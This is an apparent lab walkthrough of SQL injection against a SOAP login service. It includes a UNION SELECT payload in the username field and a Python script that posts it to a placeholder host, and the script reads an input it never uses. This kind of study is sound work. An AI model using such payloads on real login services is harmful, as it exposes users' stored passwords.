I do this Walkthrough because in my opinion it is one of the worst modules ever made, it is very incomplete and full of missing information
- Identification of the problem and context
API in use is a web service soap. Soap requests are usually sent via XML. The user’s input, such as username and password, was moved on to a function that probably performed an SQL query to authenticate the user.
The initial idea was to take advantage of an SQli to manipulate the SQL query and get a password that starts with “flag”. This led us to study how to inject SQL to an input parameter, so that the SQL query on the server was performed in order to return the desired password.
2. Analysis of the soapput soap
The payload soap that interests us is the one that sends the username and password data. In a vulnerable application, we can inject SQL directly to these parameters.
The basic payload (without SQL injections) would have a format similar to this:
<soap:Body>
<LoginRequest xmlns="http://tempuri.org/">
<username>admin</username>
<password>password</password>
</LoginRequest>
</soap:Body>
- First attempt at SQL injection
Initially we tried to inject a simple SQli using a Union Select:
admin' UNION SELECT password, NULL FROM users WHERE password LIKE '(Enter the parameter)' --
The result of this injection was that the server returned the password (or passwords) that started with “flag”, just as required.
- Adaptation of the Python script
We built a Python script to automatically send our Soap request with the SQL injection. Python script allows:
Request an input of the user (in this case, the SQli to be performed).
Build the Payload Soap with SQL injection.
Send the request to the server via requests.post ().
View the answer containing the password (or information requested).
Here is the functioning of the final python script:
import requests
while True:
cmd = input("$ ")
payload = f'''<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:tns="http://tempuri.org/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/">
<soap:Body>
<LoginRequest xmlns="http://tempuri.org/">
<username>admin' UNION SELECT password, NULL FROM users WHERE password LIKE 'Enter the parameter' -- </username>
<password>password</password>
</LoginRequest>
</soap:Body>
</soap:Envelope>'''
response = requests.post(
"http://ip:3002/wsdl",
data=payload,
headers={"SOAPAction": '"Login"'}
)
print(response.content)